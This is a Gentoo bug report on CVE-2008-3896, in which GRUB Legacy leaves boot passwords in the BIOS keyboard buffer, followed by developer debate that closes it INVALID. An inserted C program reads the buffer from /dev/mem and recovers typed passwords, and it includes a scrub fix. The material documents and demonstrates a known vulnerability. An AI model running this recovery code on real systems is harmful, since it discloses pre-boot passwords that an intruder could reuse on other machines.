Bug 239547 (CVE-2008-3896) - sys-boot/grub<=0.97 authentication passwords problem (CVE-2008-3896)
Summary: sys-boot/grub<=0.97 authentication passwords problem (CVE-2008-3896)
Alias: CVE-2008-3896
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities
Hardware: All Linux
Importance: High minor
Assignee: Gentoo Security
Whiteboard: A4 [upstream]
Depends on:
Reported: 2008-10-04 15:07 UTC by Stefan Behte (RETIRED)
Modified: 2008-10-20 19:14 UTC (History)

See Also:
Package list:
Runtime testing required: ---


Description Stefan Behte (RETIRED) gentoo-dev Security 2008-10-04 15:07:20 UTC
CVE-2008-3896: Grub Legacy 0.97 and earlier stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer before and after use, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer.
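The keyboard-buffer leak the CVE text describes, as an added example that is not code from the bug report, from GRUB or from the whitepaper cited later in comment 5. It models the BIOS Data Area in a 256-byte array, simulates the BIOS IRQ1 handler storing keystrokes and a GRUB-style prompt consuming them through INT 16h, then shows that the password is still readable from the ring afterwards (the read a root user performs on /dev/mem in the scenario of comment 5) and finally the scrub a fixed boot loader would perform. The offsets used (head at 0x41A, tail at 0x41C, ring at 0x41E..0x43D, start/end pointers at 0x480/0x482) are the standard IBM PC BIOS Data Area layout; the function names, the sample password "s3cret" and the 15-key capacity test are constructed for this example.

```c
/* Added example, not from the bug report, GRUB or the whitepaper: the BIOS
 * keyboard ring buffer behind CVE-2008-3896, modelled on a 256-byte snapshot of
 * the BIOS Data Area (physical 0x400-0x4FF). Offsets are relative to 0x400:
 * 0x1A head (next key INT 16h returns), 0x1C tail (next free slot), 0x80/0x82
 * ring start/end, default ring 0x1E-0x3E: 16 slots x (ASCII byte, scan code).
 * Build: cc -std=c99 -Wall bda_kbd.c -o bda_kbd */
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#define BDA_SIZE      256
#define BDA_KBD_HEAD  0x1A
#define BDA_KBD_TAIL  0x1C
#define BDA_KBD_START 0x80
#define BDA_KBD_END   0x82

static uint16_t rd16(const uint8_t *b, unsigned off) { return (uint16_t)(b[off] | (b[off + 1] << 8)); }
static void wr16(uint8_t *b, unsigned off, uint16_t v) { b[off] = v & 0xff; b[off + 1] = v >> 8; }
static uint16_t wrap(uint16_t pos, uint16_t start, uint16_t end) { return pos + 2 >= end ? start : (uint16_t)(pos + 2); }

/* Empty ring at the default location, as the BIOS leaves it at boot. */
void bda_init(uint8_t *bda)
{
    memset(bda, 0, BDA_SIZE);
    wr16(bda, BDA_KBD_START, 0x1E); wr16(bda, BDA_KBD_END, 0x3E);
    wr16(bda, BDA_KBD_HEAD, 0x1E);  wr16(bda, BDA_KBD_TAIL, 0x1E);
}

/* BIOS IRQ1 handler: store one keystroke at tail. Returns 0 if the ring is full (key dropped). */
int bda_put_key(uint8_t *bda, uint8_t ascii, uint8_t scan)
{
    uint16_t start = rd16(bda, BDA_KBD_START), end = rd16(bda, BDA_KBD_END);
    uint16_t head = rd16(bda, BDA_KBD_HEAD), tail = rd16(bda, BDA_KBD_TAIL);
    uint16_t next = wrap(tail, start, end);
    if (next == head) return 0;
    bda[tail] = ascii;
    bda[tail + 1] = scan;
    wr16(bda, BDA_KBD_TAIL, next);
    return 1;
}

/* INT 16h AH=00h as the boot loader calls it: return the key at head and advance.
 * The slot keeps its contents, which is the whole bug. */
int bda_get_key(uint8_t *bda, uint8_t *ascii)
{
    uint16_t head = rd16(bda, BDA_KBD_HEAD);
    if (head == rd16(bda, BDA_KBD_TAIL)) return 0;
    *ascii = bda[head];
    wr16(bda, BDA_KBD_HEAD, wrap(head, rd16(bda, BDA_KBD_START), rd16(bda, BDA_KBD_END)));
    return 1;
}

/* Type pw plus Enter, then let a GRUB-style prompt drain the ring. Returns keys consumed. */
size_t simulate_password_prompt(uint8_t *bda, const char *pw)
{
    size_t consumed = 0;
    uint8_t c;
    for (const char *p = pw; *p; p++) bda_put_key(bda, (uint8_t)*p, 0);
    bda_put_key(bda, '\r', 0x1C);                 /* 0x1C is the Enter scan code */
    while (bda_get_key(bda, &c)) consumed++;
    return consumed;
}

/* Post-boot read: walk the ring from tail (oldest slot first), keep printable ASCII. */
size_t bda_kbd_recover(const uint8_t *bda, char *out, size_t outlen)
{
    uint16_t start = rd16(bda, BDA_KBD_START), end = rd16(bda, BDA_KBD_END);
    uint16_t pos = rd16(bda, BDA_KBD_TAIL); size_t n = 0;
    if (start < 0x1E || end <= start || end > BDA_SIZE || (end - start) % 2 || pos < start || pos >= end) {
        start = 0x1E; end = 0x3E; pos = start;    /* pointers look corrupt: use the defaults */
    }
    for (unsigned i = 0; i < (end - start) / 2u && n + 1 < outlen; i++) {
        uint8_t ascii = bda[pos];                 /* low byte ASCII, high byte scan code */
        if (ascii >= 0x20 && ascii < 0x7F) out[n++] = (char)ascii;
        pos = wrap(pos, start, end);
    }
    out[n] = '\0';
    return n;
}

/* The fix a boot loader should apply once it has read the password: zero every slot
 * and reset the ring to empty (in real mode, the same stores to 0x40:0x1E..0x3D). */
void bda_kbd_scrub(uint8_t *bda)
{
    uint16_t start = rd16(bda, BDA_KBD_START), end = rd16(bda, BDA_KBD_END);
    volatile uint8_t *p = bda + start;            /* volatile: the compiler must not elide the stores */
    for (uint16_t i = 0; i < end - start; i++) p[i] = 0;
    wr16(bda, BDA_KBD_HEAD, start);
    wr16(bda, BDA_KBD_TAIL, start);
}

int main(void)
{
    uint8_t bda[BDA_SIZE];
    char out[64];
    int fd = open("/dev/mem", O_RDONLY);          /* real BDA: root on a legacy-BIOS boot */
    if (fd < 0 || pread(fd, bda, BDA_SIZE, 0x400) != BDA_SIZE) {
        bda_init(bda);                            /* otherwise: simulated boot, constructed password */
        simulate_password_prompt(bda, "s3cret");
    }
    if (fd >= 0) close(fd);
    bda_kbd_recover(bda, out, sizeof out);
    printf("keyboard ring after boot : \"%s\"\n", out);
    bda_kbd_scrub(bda);
    bda_kbd_recover(bda, out, sizeof out);
    printf("keyboard ring after scrub: \"%s\"\n", out);
    return 0;
}
```

GRUB Legacy reads its password prompt through INT 16h, so on a real legacy-BIOS machine the ring at 0x41E holds the last keys typed before the kernel took over, Enter included, and root reading /dev/mem at 0x400 gets them back exactly as the simulated run does. Whether the kernel lets root read that range depends on CONFIG_STRICT_DEVMEM and how the low megabyte is mapped; when the open or read fails the program falls back to the simulated boot. Two caveats for anyone checking a box with this: the ring only holds 15 keystrokes, so a longer password survives only in its most recent part, and a UEFI boot never fills the BDA ring, so an empty buffer there says nothing about whether the loader scrubbed it.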
Comment 1 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-04 15:12:26 UTC
GRUB Legacy is not actively developed any longer. Only bugfixes will be made so that we can continue using GRUB Legacy until GRUB 2 becomes stable enough. If you want more features in GRUB, it is a waste of time to work on GRUB Legacy, because we never accept any new feature. Instead, it is better to take part in the development of GRUB 2.
Comment 2 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-06 15:18:50 UTC
I got an answer: wrote:

there's no official fix for this and I doubt that there'll be ever one.
grub-legacy isn't maintained anymore.
If grub2 gets support for this password thing then the one implementing
it should take care of this."

Well - grub 2 isn't out, but we've got 1.96 in the tree...

Comment 3 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-07 11:56:31 UTC
I got another mail, this time from

"Hi Craig,

a) No-one is really working on grub legacy.

b) The details? If it requires a previous "hack" to modify grub or bios in order
for the attack vector to be usable, we do not really see this as a grub problem,
as grub and bios are then not in an authentic state and that problem needs
completely different protection.

If it is about password visible in memory; in most OSes you require root
privileges in order to read memory so at that point the game is already
lost as attacker can do anything anyway.

I have nothing against clearing memory having the password input. But I
do not see anyone making any changes to grub legacy. For grub 2 the
story is completely different of course.

Vesa Jääskeläinen"
Comment 4 Robert Buchholz (RETIRED) gentoo-dev 2008-10-19 19:42:54 UTC
Since root privileges are required to see the password, and root could overwrite the boot loader anyway, no trust boundaries are crossed. Closing INVALID.
Comment 5 Stefan Behte (RETIRED) gentoo-dev Security 2008-10-19 21:10:28 UTC
This is not about overwriting the bootloader.

I hope I understood everything correctly:
When using full-HD encryption, the pre-boot password should be used to decrypt the master key, and that decrypted key will be used by the OS to access the encrypted data; the plaintext password should be deleted (overwritten) from memory.

So this grub bug could lead to plain text password disclosure.

- Someone gets root access to your corporate ultra-secure server (which has full-hd-crypto & grub password protection)
- he gets the plaintext password with the methods described in the preboot_whitepaper.pdf
- he scans your network and uses that password to access other machines

He could not have done that with the decrypted master key, as it isn't the plaintext you enter at the pre-boot authentication prompt, nor with the grub password, because it is not saved on HD; there is only an MD5 hash on disk.

Sure, that's a bit unlikely; he could also modify the (pre)bootloader to store the password on HD, reboot the machine and wait for the sysadmin to enter the password, but that would...
a) be noticed immediately
b) be much more complex than copying & pasting code from the preboot whitepaper

I would have agreed to RESOLVED WONTFIX, but not to INVALID. ;)
Comment 6 Robert Buchholz (RETIRED) gentoo-dev 2008-10-20 19:13:48 UTC
(In reply to comment #5)
> I would have agreed to RESOLVED WONTFIX, but not to INVALID. ;)

I can see your point here, but you are screwed if someone gets root on a box anyway, and using the same password for different keys is not a good scheme to protect confidentiality either.